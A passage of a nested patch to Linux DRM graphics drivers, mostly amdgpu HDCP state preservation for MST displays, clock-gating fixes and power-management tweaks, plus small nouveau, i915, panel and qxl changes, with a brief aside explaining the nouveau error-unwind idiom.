+ 			  struct dc_stream_state *stream)
+@@ -8335,10 +8372,67 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 		struct amdgpu_crtc *acrtc = to_amdgpu_crtc(dm_new_con_state->base.crtc);
+ 		struct amdgpu_dm_connector *aconnector = to_amdgpu_dm_connector(connector);
+ 
++		if (!adev->dm.hdcp_workqueue)
++			continue;
++
++		pr_debug("[HDCP_DM] -------------- i : %x ----------\n", i);
++
++		if (!connector)
++			continue;
++
++		pr_debug("[HDCP_DM] connector->index: %x connect_status: %x dpms: %x\n",
++			connector->index, connector->status, connector->dpms);
++		pr_debug("[HDCP_DM] state protection old: %x new: %x\n",
++			old_con_state->content_protection, new_con_state->content_protection);
++
++		if (aconnector->dc_sink) {
++			if (aconnector->dc_sink->sink_signal != SIGNAL_TYPE_VIRTUAL &&
++				aconnector->dc_sink->sink_signal != SIGNAL_TYPE_NONE) {
++				pr_debug("[HDCP_DM] pipe_ctx dispname=%s\n",
++				aconnector->dc_sink->edid_caps.display_name);
++			}
++		}
++
+ 		new_crtc_state = NULL;
++		old_crtc_state = NULL;
+ 
+-		if (acrtc)
++		if (acrtc) {
+ 			new_crtc_state = drm_atomic_get_new_crtc_state(state, &acrtc->base);
++			old_crtc_state = drm_atomic_get_old_crtc_state(state, &acrtc->base);
++		}
++
++		if (old_crtc_state)
++			pr_debug("old crtc en: %x a: %x m: %x a-chg: %x c-chg: %x\n",
++			old_crtc_state->enable,
++			old_crtc_state->active,
++			old_crtc_state->mode_changed,
++			old_crtc_state->active_changed,
++			old_crtc_state->connectors_changed);
++
++		if (new_crtc_state)
++			pr_debug("NEW crtc en: %x a: %x m: %x a-chg: %x c-chg: %x\n",
++			new_crtc_state->enable,
++			new_crtc_state->active,
++			new_crtc_state->mode_changed,
++			new_crtc_state->active_changed,
++			new_crtc_state->connectors_changed);
++	}
++
++	for_each_oldnew_connector_in_state(state, connector, old_con_state, new_con_state, i) {
++		struct dm_connector_state *dm_new_con_state = to_dm_connector_state(new_con_state);
++		struct amdgpu_crtc *acrtc = to_amdgpu_crtc(dm_new_con_state->base.crtc);
++		struct amdgpu_dm_connector *aconnector = to_amdgpu_dm_connector(connector);
++
++		if (!adev->dm.hdcp_workqueue)
++			continue;
++
++		new_crtc_state = NULL;
++		old_crtc_state = NULL;
++
++		if (acrtc) {
++			new_crtc_state = drm_atomic_get_new_crtc_state(state, &acrtc->base);
++			old_crtc_state = drm_atomic_get_old_crtc_state(state, &acrtc->base);
++		}
+ 
+ 		dm_new_crtc_state = to_dm_crtc_state(new_crtc_state);
+ 
+@@ -8350,11 +8444,44 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 			continue;
+ 		}
+ 
+-		if (is_content_protection_different(new_con_state, old_con_state, connector, adev->dm.hdcp_workqueue))
++		if (is_content_protection_different(new_crtc_state, old_crtc_state, new_con_state,
++											old_con_state, connector, adev->dm.hdcp_workqueue)) {
++			/* When a display is unplugged from the MST hub, the connector
++			 * will be destroyed within dm_dp_mst_connector_destroy and its
++			 * hdcp properties, like type, undesired, desired, enabled,
++			 * will be lost. So, save the hdcp properties into hdcp_work
++			 * within amdgpu_dm_atomic_commit_tail. If the same display is
++			 * plugged back with the same display index, its hdcp properties
++			 * will be retrieved from hdcp_work within dm_dp_mst_get_modes.
++			 */
++
++			bool enable_encryption = false;
++
++			if (new_con_state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED)
++				enable_encryption = true;
++
++			if (aconnector->dc_link && aconnector->dc_sink &&
++				aconnector->dc_link->type == dc_connection_mst_branch) {
++				struct hdcp_workqueue *hdcp_work = adev->dm.hdcp_workqueue;
++				struct hdcp_workqueue *hdcp_w =
++					&hdcp_work[aconnector->dc_link->link_index];
++
++				hdcp_w->hdcp_content_type[connector->index] =
++					new_con_state->hdcp_content_type;
++				hdcp_w->content_protection[connector->index] =
++					new_con_state->content_protection;
++			}
++
++			if (new_crtc_state && new_crtc_state->mode_changed &&
++				new_con_state->content_protection >= DRM_MODE_CONTENT_PROTECTION_DESIRED)
++				enable_encryption = true;
++
++			DRM_INFO("[HDCP_DM] hdcp_update_display enable_encryption = %x\n", enable_encryption);
++
+ 			hdcp_update_display(
+ 				adev->dm.hdcp_workqueue, aconnector->dc_link->link_index, aconnector,
+-				new_con_state->hdcp_content_type,
+-				new_con_state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED);
++				new_con_state->hdcp_content_type, enable_encryption);
++		}
+ 	}
+ #endif
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.h
+index 09294ff122fea..bbbf7d0eff82f 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.h
+@@ -52,6 +52,20 @@ struct hdcp_workqueue {
+ 	struct mod_hdcp_link link;
+ 
+ 	enum mod_hdcp_encryption_status encryption_status;
++
++	/* When a display is unplugged from the MST hub, the connector
++	 * will be destroyed within dm_dp_mst_connector_destroy and its
++	 * hdcp properties, like type, undesired, desired, enabled,
++	 * will be lost. So, save the hdcp properties into hdcp_work
++	 * within amdgpu_dm_atomic_commit_tail. If the same display is
++	 * plugged back with the same display index, its hdcp properties
++	 * will be retrieved from hdcp_work within dm_dp_mst_get_modes.
++	 */
++	/* un-desired, desired, enabled */
++	unsigned int content_protection[AMDGPU_DM_MAX_DISPLAY_INDEX];
++	/* hdcp1.x, hdcp2.x */
++	unsigned int hdcp_content_type[AMDGPU_DM_MAX_DISPLAY_INDEX];
++
+ 	uint8_t max_link;
+ 
+ 	uint8_t *srm;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index d07e1053b36b3..a9ddff774a978 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -32,6 +32,10 @@
+ #include "amdgpu_dm.h"
+ #include "amdgpu_dm_mst_types.h"
+ 
++#ifdef CONFIG_DRM_AMD_DC_HDCP
++#include "amdgpu_dm_hdcp.h"
++#endif
++
+ #include "dc.h"
+ #include "dm_helpers.h"
+ 
+@@ -363,6 +367,32 @@ static int dm_dp_mst_get_modes(struct drm_connector *connector)
+ 		/* dc_link_add_remote_sink returns a new reference */
+ 		aconnector->dc_sink = dc_sink;
+ 
++		/* When a display is unplugged from the MST hub, the connector
++		 * will be destroyed within dm_dp_mst_connector_destroy and its
++		 * hdcp properties, like type, undesired, desired, enabled,
++		 * will be lost. So, save the hdcp properties into hdcp_work
++		 * within amdgpu_dm_atomic_commit_tail. If the same display is
++		 * plugged back with the same display index, its hdcp properties
++		 * will be retrieved from hdcp_work within dm_dp_mst_get_modes.
++		 */
++#ifdef CONFIG_DRM_AMD_DC_HDCP
++		if (aconnector->dc_sink && connector->state) {
++			struct drm_device *dev = connector->dev;
++			struct amdgpu_device *adev = drm_to_adev(dev);
++
++			if (adev->dm.hdcp_workqueue) {
++				struct hdcp_workqueue *hdcp_work = adev->dm.hdcp_workqueue;
++				struct hdcp_workqueue *hdcp_w =
++					&hdcp_work[aconnector->dc_link->link_index];
++
++				connector->state->hdcp_content_type =
++				hdcp_w->hdcp_content_type[connector->index];
++				connector->state->content_protection =
++				hdcp_w->content_protection[connector->index];
++			}
++		}
++#endif
++
+ 		if (aconnector->dc_sink) {
+ 			amdgpu_dm_update_freesync_caps(
+ 					connector, aconnector->edid);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dccg.h b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dccg.h
+index 915a20461c77c..893c0809cd4e0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dccg.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dccg.h
+@@ -230,7 +230,8 @@
+ 	type DTBCLK_P2_SRC_SEL;\
+ 	type DTBCLK_P2_EN;\
+ 	type DTBCLK_P3_SRC_SEL;\
+-	type DTBCLK_P3_EN;
++	type DTBCLK_P3_EN;\
++	type DENTIST_DISPCLK_CHG_DONE;
+ 
+ struct dccg_shift {
+ 	DCCG_REG_FIELD_LIST(uint8_t)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+index 7d2b982506fd7..cef32a1f91cdc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+@@ -47,6 +47,14 @@ void dccg31_update_dpp_dto(struct dccg *dccg, int dpp_inst, int req_dppclk)
+ {
+ 	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
+ 
++	if (dccg->dpp_clock_gated[dpp_inst]) {
++		/*
++		 * Do not update the DPPCLK DTO if the clock is stopped.
++		 * It is treated the same as if the pipe itself were in PG.
++		 */
++		return;
++	}
++
+ 	if (dccg->ref_dppclk && req_dppclk) {
+ 		int ref_dppclk = dccg->ref_dppclk;
+ 		int modulo, phase;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+index 85ea3334355c2..b74705c1c8dcc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+@@ -296,6 +296,9 @@ static void dccg314_dpp_root_clock_control(
+ {
+ 	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
+ 
++	if (dccg->dpp_clock_gated[dpp_inst] != clock_on)
++		return;
++
+ 	if (clock_on) {
+ 		/* turn off the DTO and leave phase/modulo at max */
+ 		REG_UPDATE(DPPCLK_DTO_CTRL, DPPCLK_DTO_ENABLE[dpp_inst], 0);
+@@ -309,6 +312,8 @@ static void dccg314_dpp_root_clock_control(
+ 			  DPPCLK0_DTO_PHASE, 0,
+ 			  DPPCLK0_DTO_MODULO, 1);
+ 	}
++
++	dccg->dpp_clock_gated[dpp_inst] = !clock_on;
+ }
+ 
+ static const struct dccg_funcs dccg314_funcs = {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index b7782433ce6ba..503ab45b4ace3 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -920,6 +920,22 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 			.afmt = true,
+ 		}
+ 	},
++
++	.root_clock_optimization = {
++			.bits = {
++					.dpp = true,
++					.dsc = false,
++					.hdmistream = false,
++					.hdmichar = false,
++					.dpstream = false,
++					.symclk32_se = false,
++					.symclk32_le = false,
++					.symclk_fe = false,
++					.physymclk = false,
++					.dpiasymclk = false,
++			}
++	},
++
+ 	.seamless_boot_odm_combine = true
+ };
+ 
+@@ -1917,6 +1933,10 @@ static bool dcn314_resource_construct(
+ 		dc->debug = debug_defaults_drv;
+ 	else
+ 		dc->debug = debug_defaults_diags;
++
++	/* Disable root clock optimization */
++	dc->debug.root_clock_optimization.u32All = 0;
++
+ 	// Init the vm_helper
+ 	if (dc->vm_helper)
+ 		vm_helper_init(dc->vm_helper, 16);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+index 3fb4bcc343531..ffbb739d85b69 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+@@ -42,6 +42,20 @@
+ #define DC_LOGGER \
+ 	dccg->ctx->logger
+ 
++/* This function is a workaround for writing to OTG_PIXEL_RATE_DIV
++ * without the risk of causing a DIG FIFO error.
++ */
++static void dccg32_wait_for_dentist_change_done(
++	struct dccg *dccg)
++{
++	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
++
++	uint32_t dentist_dispclk_value = REG_READ(DENTIST_DISPCLK_CNTL);
++
++	REG_WRITE(DENTIST_DISPCLK_CNTL, dentist_dispclk_value);
++	REG_WAIT(DENTIST_DISPCLK_CNTL, DENTIST_DISPCLK_CHG_DONE, 1, 50, 2000);
++}
++
+ static void dccg32_get_pixel_rate_div(
+ 		struct dccg *dccg,
+ 		uint32_t otg_inst,
+@@ -110,21 +124,29 @@ static void dccg32_set_pixel_rate_div(
+ 		REG_UPDATE_2(OTG_PIXEL_RATE_DIV,
+ 				OTG0_PIXEL_RATE_DIVK1, k1,
+ 				OTG0_PIXEL_RATE_DIVK2, k2);
++
++		dccg32_wait_for_dentist_change_done(dccg);
+ 		break;
+ 	case 1:
+ 		REG_UPDATE_2(OTG_PIXEL_RATE_DIV,
+ 				OTG1_PIXEL_RATE_DIVK1, k1,
+ 				OTG1_PIXEL_RATE_DIVK2, k2);
++
++		dccg32_wait_for_dentist_change_done(dccg);
+ 		break;
+ 	case 2:
+ 		REG_UPDATE_2(OTG_PIXEL_RATE_DIV,
+ 				OTG2_PIXEL_RATE_DIVK1, k1,
+ 				OTG2_PIXEL_RATE_DIVK2, k2);
++
++		dccg32_wait_for_dentist_change_done(dccg);
+ 		break;
+ 	case 3:
+ 		REG_UPDATE_2(OTG_PIXEL_RATE_DIV,
+ 				OTG3_PIXEL_RATE_DIVK1, k1,
+ 				OTG3_PIXEL_RATE_DIVK2, k2);
++
++		dccg32_wait_for_dentist_change_done(dccg);
+ 		break;
+ 	default:
+ 		BREAK_TO_DEBUGGER();
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.h
+index 1c46fad0977bf..fc3c9c650d43c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.h
+@@ -147,7 +147,8 @@
+ 	DCCG_SF(DTBCLK_P_CNTL, DTBCLK_P3_SRC_SEL, mask_sh),\
+ 	DCCG_SF(DTBCLK_P_CNTL, DTBCLK_P3_EN, mask_sh),\
+ 	DCCG_SF(DCCG_AUDIO_DTO_SOURCE, DCCG_AUDIO_DTO_SEL, mask_sh),\
+-	DCCG_SF(DCCG_AUDIO_DTO_SOURCE, DCCG_AUDIO_DTO0_SOURCE_SEL, mask_sh)
++	DCCG_SF(DCCG_AUDIO_DTO_SOURCE, DCCG_AUDIO_DTO0_SOURCE_SEL, mask_sh),\
++	DCCG_SF(DENTIST_DISPCLK_CNTL, DENTIST_DISPCLK_CHG_DONE, mask_sh)
+ 
+ 
+ struct dccg *dccg32_create(
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index f5fa7abd97fc7..d477dcc9149fa 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -1177,7 +1177,7 @@ unsigned int dcn32_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsign
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+ 		else
+ 			*k2_div = PIXEL_RATE_DIV_BY_4;
+-	} else if (dc_is_dp_signal(stream->signal)) {
++	} else if (dc_is_dp_signal(stream->signal) || dc_is_virtual_signal(stream->signal)) {
+ 		if (two_pix_per_container) {
+ 			*k1_div = PIXEL_RATE_DIV_BY_1;
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+index 026cf13d203fc..03cdfb5577888 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+@@ -1272,7 +1272,8 @@ unsigned int dcn32_calc_num_avail_chans_for_mall(struct dc *dc, int num_chans);
+       DCCG_SRII(PHASE, DTBCLK_DTO, 0), DCCG_SRII(PHASE, DTBCLK_DTO, 1),        \
+       DCCG_SRII(PHASE, DTBCLK_DTO, 2), DCCG_SRII(PHASE, DTBCLK_DTO, 3),        \
+       SR(DCCG_AUDIO_DTBCLK_DTO_MODULO), SR(DCCG_AUDIO_DTBCLK_DTO_PHASE),       \
+-      SR(OTG_PIXEL_RATE_DIV), SR(DTBCLK_P_CNTL), SR(DCCG_AUDIO_DTO_SOURCE)     \
++      SR(OTG_PIXEL_RATE_DIV), SR(DTBCLK_P_CNTL),                               \
++      SR(DCCG_AUDIO_DTO_SOURCE), SR(DENTIST_DISPCLK_CNTL)                      \
+   )
+ 
+ /* VMID */
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index 2bb768413c92a..19f55657272e4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -808,7 +808,7 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 					v->SwathHeightC[k],
+ 					TWait,
+ 					(v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ||
+-						v->DCFCLKPerState[mode_lib->vba.VoltageLevel] <= MIN_DCFCLK_FREQ_MHZ) ?
++						v->DCFCLKPerState[mode_lib->vba.VoltageLevel] <= DCFCLK_FREQ_EXTRA_PREFETCH_REQ_MHZ) ?
+ 							mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 					/* Output */
+ 					&v->DSTXAfterScaler[k],
+@@ -3289,7 +3289,7 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->swath_width_chroma_ub_this_state[k],
+ 							v->SwathHeightYThisState[k],
+ 							v->SwathHeightCThisState[k], v->TWait,
+-							(v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ || v->DCFCLKState[i][j] <= MIN_DCFCLK_FREQ_MHZ) ?
++							(v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ || v->DCFCLKState[i][j] <= DCFCLK_FREQ_EXTRA_PREFETCH_REQ_MHZ) ?
+ 									mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 
+ 							/* Output */
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+index e92eee2c664d0..a475775bc3894 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+@@ -52,7 +52,7 @@
+ #define BPP_BLENDED_PIPE 0xffffffff
+ 
+ #define MEM_STROBE_FREQ_MHZ 1600
+-#define MIN_DCFCLK_FREQ_MHZ 200
++#define DCFCLK_FREQ_EXTRA_PREFETCH_REQ_MHZ 300
+ #define MEM_STROBE_MAX_DELIVERY_TIME_US 60.0
+ 
+ struct display_mode_lib;
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+index ad6acd1b34e1d..9651cccb084a3 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+@@ -68,6 +68,7 @@ struct dccg {
+ 	const struct dccg_funcs *funcs;
+ 	int pipe_dppclk_khz[MAX_PIPES];
+ 	int ref_dppclk;
++	bool dpp_clock_gated[MAX_PIPES];
+ 	//int dtbclk_khz[MAX_PIPES];/* TODO needs to be removed */
+ 	//int audio_dtbclk_khz;/* TODO needs to be removed */
+ 	//int ref_dtbclk_khz;/* TODO needs to be removed */
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index d191ff52d4f06..a664a0a284784 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1562,9 +1562,9 @@ static int smu_disable_dpms(struct smu_context *smu)
+ 
+ 	/*
+ 	 * For SMU 13.0.4/11, PMFW will handle the features disablement properly
+-	 * for gpu reset case. Driver involvement is unnecessary.
++	 * for gpu reset and S0i3 cases. Driver involvement is unnecessary.
+ 	 */
+-	if (amdgpu_in_reset(adev)) {
++	if (amdgpu_in_reset(adev) || adev->in_s0ix) {
+ 		switch (adev->ip_versions[MP1_HWIP][0]) {
+ 		case IP_VERSION(13, 0, 4):
+ 		case IP_VERSION(13, 0, 11):
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 31835d96deef9..839a812e0da32 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -588,7 +588,9 @@ err0_out:
+ 	return -ENOMEM;
+ }
+ 
+-static uint32_t sienna_cichlid_get_throttler_status_locked(struct smu_context *smu)
++static uint32_t sienna_cichlid_get_throttler_status_locked(struct smu_context *smu,
++							   bool use_metrics_v3,
++							   bool use_metrics_v2)
+ {
+ 	struct smu_table_context *smu_table= &smu->smu_table;
+ 	SmuMetricsExternal_t *metrics_ext =
+@@ -596,13 +598,11 @@ static uint32_t sienna_cichlid_get_throttler_status_locked(struct smu_context *s
+ 	uint32_t throttler_status = 0;
+ 	int i;
+ 
+-	if ((smu->adev->ip_versions[MP1_HWIP][0] == IP_VERSION(11, 0, 7)) &&
+-	     (smu->smc_fw_version >= 0x3A4900)) {
++	if (use_metrics_v3) {
+ 		for (i = 0; i < THROTTLER_COUNT; i++)
+ 			throttler_status |=
+ 				(metrics_ext->SmuMetrics_V3.ThrottlingPercentage[i] ? 1U << i : 0);
+-	} else if ((smu->adev->ip_versions[MP1_HWIP][0] == IP_VERSION(11, 0, 7)) &&
+-	     (smu->smc_fw_version >= 0x3A4300)) {
++	} else if (use_metrics_v2) {
+ 		for (i = 0; i < THROTTLER_COUNT; i++)
+ 			throttler_status |=
+ 				(metrics_ext->SmuMetrics_V2.ThrottlingPercentage[i] ? 1U << i : 0);
+@@ -864,7 +864,7 @@ static int sienna_cichlid_get_smu_metrics_data(struct smu_context *smu,
+ 			metrics->TemperatureVrSoc) * SMU_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 		break;
+ 	case METRICS_THROTTLER_STATUS:
+-		*value = sienna_cichlid_get_throttler_status_locked(smu);
++		*value = sienna_cichlid_get_throttler_status_locked(smu, use_metrics_v3, use_metrics_v2);
+ 		break;
+ 	case METRICS_CURR_FANSPEED:
+ 		*value = use_metrics_v3 ? metrics_v3->CurrFanSpeed :
+@@ -4017,7 +4017,7 @@ static ssize_t sienna_cichlid_get_gpu_metrics(struct smu_context *smu,
+ 	gpu_metrics->current_dclk1 = use_metrics_v3 ? metrics_v3->CurrClock[PPCLK_DCLK_1] :
+ 		use_metrics_v2 ? metrics_v2->CurrClock[PPCLK_DCLK_1] : metrics->CurrClock[PPCLK_DCLK_1];
+ 
+-	gpu_metrics->throttle_status = sienna_cichlid_get_throttler_status_locked(smu);
++	gpu_metrics->throttle_status = sienna_cichlid_get_throttler_status_locked(smu, use_metrics_v3, use_metrics_v2);
+ 	gpu_metrics->indep_throttle_status =
+ 			smu_cmn_get_indep_throttler_status(gpu_metrics->throttle_status,
+ 							   sienna_cichlid_throttler_map);
+diff --git a/drivers/gpu/drm/i915/display/intel_sdvo.c b/drivers/gpu/drm/i915/display/intel_sdvo.c
+index a15e09b551708..2c2e0f041f869 100644
+--- a/drivers/gpu/drm/i915/display/intel_sdvo.c
++++ b/drivers/gpu/drm/i915/display/intel_sdvo.c
+@@ -2727,7 +2727,7 @@ static struct intel_sdvo_connector *intel_sdvo_connector_alloc(void)
+ 	__drm_atomic_helper_connector_reset(&sdvo_connector->base.base,
+ 					    &conn_state->base.base);
+ 
+-	INIT_LIST_HEAD(&sdvo_connector->base.panel.fixed_modes);
++	intel_panel_init_alloc(&sdvo_connector->base);
+ 
+ 	return sdvo_connector;
+ }
+diff --git a/drivers/gpu/drm/nouveau/nouveau_connector.c b/drivers/gpu/drm/nouveau/nouveau_connector.c
+index 49c5451cdfb16..d6dd79541f6a9 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_connector.c
++++ b/drivers/gpu/drm/nouveau/nouveau_connector.c
+@@ -1407,8 +1407,7 @@ nouveau_connector_create(struct drm_device *dev,
+ 		ret = nvif_conn_ctor(&disp->disp, nv_connector->base.name, nv_connector->index,
+ 				     &nv_connector->conn);
+ 		if (ret) {
+-			kfree(nv_connector);
+-			return ERR_PTR(ret);
++			goto drm_conn_err;
+ 		}
+ 	}
+ 
+@@ -1470,4 +1469,9 @@ nouveau_connector_create(struct drm_device *dev,
+ 
+ 	drm_connector_register(connector);
+ 	return connector;
++
++drm_conn_err:
++	drm_connector_cleanup(connector);
++	kfree(nv_connector);
++	return ERR_PTR(ret);
+ }
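
The nouveau change above replaces an ad-hoc kfree()-and-return with the function's common unwind path, so every failure after the connector is initialized also runs drm_connector_cleanup(). A minimal sketch of the single-unwind-label idiom this follows, with hypothetical foo_* names rather than nouveau's actual helpers:

#include <linux/slab.h>
#include <linux/err.h>

struct foo { int id; };

int foo_init_hw(struct foo *f);		/* assumed helpers, declared  */
int foo_register(struct foo *f);	/* only to keep the sketch    */
void foo_fini_hw(struct foo *f);	/* self-contained             */

static struct foo *foo_create(void)
{
	struct foo *f;
	int ret;

	f = kzalloc(sizeof(*f), GFP_KERNEL);
	if (!f)
		return ERR_PTR(-ENOMEM);

	ret = foo_init_hw(f);
	if (ret)
		goto err_free;

	ret = foo_register(f);
	if (ret)
		goto err_fini;

	return f;

err_fini:
	foo_fini_hw(f);	/* undo exactly what succeeded before the failure */
err_free:
	kfree(f);
	return ERR_PTR(ret);
}

Each label undoes only the steps that completed before the failing one, so adding a setup step later means adding one label instead of touching every earlier error branch.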
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index f851aaf2c5917..5e067ba7e5fba 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -969,21 +969,21 @@ static const struct panel_desc auo_g104sn02 = {
+ 	.connector_type = DRM_MODE_CONNECTOR_LVDS,
+ };
+ 
+-static const struct drm_display_mode auo_g121ean01_mode = {
+-	.clock = 66700,
+-	.hdisplay = 1280,
+-	.hsync_start = 1280 + 58,
+-	.hsync_end = 1280 + 58 + 8,
+-	.htotal = 1280 + 58 + 8 + 70,
+-	.vdisplay = 800,
+-	.vsync_start = 800 + 6,
+-	.vsync_end = 800 + 6 + 4,
+-	.vtotal = 800 + 6 + 4 + 10,
++static const struct display_timing auo_g121ean01_timing = {
++	.pixelclock = { 60000000, 74400000, 90000000 },
++	.hactive = { 1280, 1280, 1280 },
++	.hfront_porch = { 20, 50, 100 },
++	.hback_porch = { 20, 50, 100 },
++	.hsync_len = { 30, 100, 200 },
++	.vactive = { 800, 800, 800 },
++	.vfront_porch = { 2, 10, 25 },
++	.vback_porch = { 2, 10, 25 },
++	.vsync_len = { 4, 18, 50 },
+ };
+ 
+ static const struct panel_desc auo_g121ean01 = {
+-	.modes = &auo_g121ean01_mode,
+-	.num_modes = 1,
++	.timings = &auo_g121ean01_timing,
++	.num_timings = 1,
+ 	.bpc = 8,
+ 	.size = {
+ 		.width = 261,
+diff --git a/drivers/gpu/drm/qxl/qxl_drv.h b/drivers/gpu/drm/qxl/qxl_drv.h
+index 432758ad39a35..94753e017ea8d 100644
+--- a/drivers/gpu/drm/qxl/qxl_drv.h
++++ b/drivers/gpu/drm/qxl/qxl_drv.h
+@@ -312,7 +312,7 @@ int qxl_gem_object_create_with_handle(struct qxl_device *qdev,
+ 				      u32 domain,
+ 				      size_t size,
+ 				      struct qxl_surface *surf,
+-				      struct qxl_bo **qobj,
++				      struct drm_gem_object **gobj,
+ 				      uint32_t *handle);
+ void qxl_gem_object_free(struct drm_gem_object *gobj);
+ int qxl_gem_object_open(struct drm_gem_object *obj, struct drm_file *file_priv);
+diff --git a/drivers/gpu/drm/qxl/qxl_dumb.c b/drivers/gpu/drm/qxl/qxl_dumb.c
+index d636ba6854513..17df5c7ccf691 100644
+--- a/drivers/gpu/drm/qxl/qxl_dumb.c
++++ b/drivers/gpu/drm/qxl/qxl_dumb.c
+@@ -34,6 +34,7 @@ int qxl_mode_dumb_create(struct drm_file *file_priv,
+ {
+ 	struct qxl_device *qdev = to_qxl(dev);
+ 	struct qxl_bo *qobj;
++	struct drm_gem_object *gobj;
+ 	uint32_t handle;
+ 	int r;
